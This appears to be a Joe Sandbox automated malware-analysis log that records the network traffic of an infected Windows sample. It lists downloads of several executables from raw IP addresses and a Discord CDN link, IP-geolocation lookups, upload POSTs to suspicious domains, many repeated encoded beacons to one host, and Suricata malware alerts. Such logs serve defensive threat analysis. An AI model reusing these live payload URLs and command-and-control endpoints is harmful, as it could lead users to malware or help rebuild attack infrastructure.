Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="univ.exe";Content-Length: 331776Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 28 Sep 2024 18:18:14 GMTETag: "5d8600-62331fec2a069"Accept-Ranges: bytesContent-Length: 6129152Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Sat, 28 Sep 2024 22:53:22 GMTContent-Type: application/octet-streamContent-Length: 3128802Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=stories.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: public
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:54:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:54:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-stream
Source: Joe Sandbox View IP Address: 194.58.114.223 194.58.114.223
Source: Joe Sandbox View IP Address: 80.66.75.114 80.66.75.114
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: ipinfo.io
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49708 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 80.66.75.114:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49713 -> 147.45.60.44:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 194.58.114.223:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49710 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 176.113.115.95:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49710 -> 103.130.147.211:80
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: HEAD /attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621&is=66f854a1&hm=fc4266f43c6f8dfc860fb6b6d8abbcf74b2c0c3aad95f3315ea5328c3afac3cf& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621&is=66f854a1&hm=fc4266f43c6f8dfc860fb6b6d8abbcf74b2c0c3aad95f3315ea5328c3afac3cf& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=wpi6oPUcntYrXWT3PYGwGgDWKmpGfD4ZkuNO6kBvh64-1727564002-1.0.1.1-MrMb8JOnPSN8tnxNgmDckRkxoeMJPdy.Zdp6geseOA1kyYiRgyy32DpdsDfaphc.ai880_T0oqzy1Ij9IOvFEQ; _cfuvid=Fux3.V5pZy3_FTP4N1VuUhIkq8HQnc5B3SRi7LPp5jE-1727564002783-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /1S3fd7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplog.co
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=zPvL5qHLNFjzjGH64_q7uWh7bq6YbdsIYhoNDxlcPc8-1727564030-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: ghostreedmnu.shop
Source: global traffic HTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.91.200.135
Source: global traffic HTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 45.91.200.135
Source: global traffic HTTP traffic detected: HEAD /Files/Silencer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /d/385121 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 194.58.114.223Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /dl?name=mixnine HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 80.66.75.114Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /thebig/stories.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.95Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /Files/Channel2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /dergrherg/setup1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: marafon.inCache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /Files/CheckTool.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /Files/tac.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dl?name=mixnine HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 80.66.75.114Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/Channel2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/Silencer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/CheckTool.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.95Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dergrherg/setup1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: marafon.inCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d/385121 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 194.58.114.223Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Files/tac.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 453Host: 45.91.200.135
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary79420754User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: fivevh5pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary76379554User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 57477Host: fivevh5pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary13378488User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 32239Host: fivevh5pt.top
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c444db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf814c6eb959d3e HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic HTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908744815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b417e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929f3dc96f9113 HTTP/1.1Host: ejrsoyz.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: unknown TCP traffic detected without corresponding DNS query: 45.91.200.135 (10 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 103.130.147.211 (24 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 80.66.75.114 (9 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 194.58.114.223 (4 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.95 (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0050CB10 InternetOpenA,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 3_2_0050CB10
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1 | Connection: Keep-Alive | Referer: https://ipinfo.io/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: ipinfo.io
